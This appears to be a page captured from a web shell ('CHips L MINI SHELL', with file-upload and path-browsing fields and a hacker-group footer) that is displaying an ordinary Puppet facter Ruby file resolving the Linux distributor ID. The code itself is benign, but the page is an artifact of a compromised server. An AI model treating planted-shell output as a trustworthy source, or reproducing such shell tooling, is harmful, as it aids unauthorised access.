CHips L MINI SHELL

CHips L pro

Current Path : /opt/puppetlabs/puppet/lib/ruby/gems/2.5.0/gems/facter-ng-4.2.5/lib/facter/facts/rhel/
Upload File :
Current File : //opt/puppetlabs/puppet/lib/ruby/gems/2.5.0/gems/facter-ng-4.2.5/lib/facter/facts/rhel/lsbdistid.rb

# frozen_string_literal: true

module Facts
  module Rhel
    class Lsbdistid
      FACT_NAME = 'lsbdistid'
      TYPE = :legacy

      def call_the_resolver
        fact_value = Facter::Resolvers::LsbRelease.resolve(:distributor_id)

        Facter::ResolvedFact.new(FACT_NAME, fact_value, :legacy)
      end
    end
  end
end

Copyright 2K16 - 2K18 Indonesian Hacker Rulez